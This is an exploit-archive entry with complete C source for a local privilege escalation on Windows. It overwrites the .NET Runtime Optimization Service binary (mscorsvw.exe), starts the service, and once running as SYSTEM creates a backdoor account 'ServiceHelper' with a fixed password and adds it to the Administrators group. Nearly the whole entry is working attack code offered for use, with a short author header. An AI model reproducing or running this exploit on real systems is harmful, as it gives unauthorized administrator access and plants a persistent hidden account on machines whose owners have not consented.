.NET Runtime Optimization Service Privilege Escalation Exploit

2011-03-09T00:00:00
ID 1337DAY-ID-15553
Type zdt
Reporter XenoMuta
Modified 2011-03-09T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            /*
# Exploit Title: .NET Runtime Optimization Service Privilege Escalation
# Date: 03-07-2011
# Author: XenoMuta <[email protected]>
# Version: v2.0.50727
# Tested on: Windows XP (sp3), 2003 R2, 7
# CVE : n/a
 
    _  __                 __  ___      __
   | |/ /__  ____  ____  /  |/  /_  __/ /_____ _
   |   / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
  /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ /
 /_/|_\___/_/ /_/\____/_/  /_/\__,_/\__/\__,_/
 
 xenomuta [at] tuxfamily.org
 xenomuta [at] gmail.com
 http://xenomuta.tuxfamily.org/ - Methylxantina 256mg
 
 This one's a no-brainer, plain simple:
 
 This service's EXE file can be overwritten by any non-admin domain user
 and local power users ( wich are the default permissions set ).
 This exploit compiles to a service that uses the original service's id.
 
 Tested on Windows 2003, WinXP (sp3) and Win7
 ( my guess is that it runs on any win box running this service ).
 
 greetz to fr1t0l4y, L.Garay, siriguillo and the c0ff33 br34k t34m!!
  
 bless y'all!
 
*/
#include <stdio.h>
#include <windows.h>
 
SERVICE_STATUS          ServiceStatus;
SERVICE_STATUS_HANDLE   hStatus;
 
#define PWN_EXE     "c:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe"
#define PWN_SHORT   "mscorsvw.exe"
#define PWN_NAME    ".NET Runtime Optimization Service v2.0.50727_X86"
#define PWN_ID      "clr_optimization_v2.0.50727_32"
 
void  ServiceMain(int argc, char** argv) {
    if (InitService()) {
       ServiceStatus.dwCurrentState = SERVICE_STOPPED;
       ServiceStatus.dwWin32ExitCode = -1;
       SetServiceStatus(hStatus, &ServiceStatus);
       return;
    }
   ServiceStatus.dwCurrentState = SERVICE_RUNNING;
   SetServiceStatus (hStatus, &ServiceStatus);
}
 
void ControlHandler(DWORD request);
int InitService();
 
int main(int argc, char **argv) {
    char acUserName[100];
    DWORD nUserName = sizeof(acUserName);
    GetUserName(acUserName, &nUserName);
 
    if (strcmp((char *)&acUserName, "SYSTEM")) {
        char *str = (char *)malloc(2048);
        memset(str, 0, 2048);
        snprintf(str, 2048, "%s.bak", PWN_EXE);
        if (rename(PWN_EXE, str) != 0) {
           fprintf(stderr, " :(  sorry, can't write to file.\n");
           exit(1);
        }
        CopyFile(argv[0], PWN_EXE, !0);
        snprintf(str, 2048, "net start \"%s\" 2> NUL > NUL",PWN_NAME);
        printf("\n >:D should have created a \n\n Username:\tServiceHelper\n Password:\tILov3Coff33!\n\n");
        system(str);
    }
 
    SERVICE_TABLE_ENTRY ServiceTable[2];
 
    ServiceTable[0].lpServiceName = PWN_ID;
    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
 
    ServiceTable[1].lpServiceName = NULL;
    ServiceTable[1].lpServiceProc = NULL;
    StartServiceCtrlDispatcher(ServiceTable);
 
    return 0;
}
 
int InitService() {
    system("cmd /c net user ServiceHelper ILov3Coff33! /add & net localgroup Administrators ServiceHelper /add");
}



#  0day.today [2018-04-03]  #